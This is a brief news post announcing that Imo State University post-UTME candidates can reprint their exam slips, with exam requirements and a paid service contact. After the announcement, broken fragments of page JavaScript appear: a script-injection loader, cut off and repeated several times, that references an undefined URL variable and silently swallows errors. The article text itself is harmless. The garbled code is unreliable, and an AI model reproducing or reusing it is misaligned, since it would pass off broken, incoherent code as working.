IMSU News

IMSU reprinting for 2023/2024 post UTME candidates has commenced

IMSU reprinting for 2023/2024 post UTME candidates has commenced

This is to inform the general public that reprinting has commenced for all candidates that registered for Imo State University, Oweri Post UTME.

All candidates are expected to reprint their slip to know their exam date, venue and time of exam.

requirement for exam still remains the;

  1. Registration Slip
  2. Original Jamb result slip.

Note; Exam is CBT (computer based test).

O level upload is also necessary for the admission process.

Contact Divine Portal on 07062237559 for more information.

You can visit us in our office for Jamb result printing and o level upload @ Shop 2 IMSU Plaza, Along Front Gate, Imo State University, Owerri.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

See also  Imo State University, Owerri (IMSU) star radio station has been reinstated

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button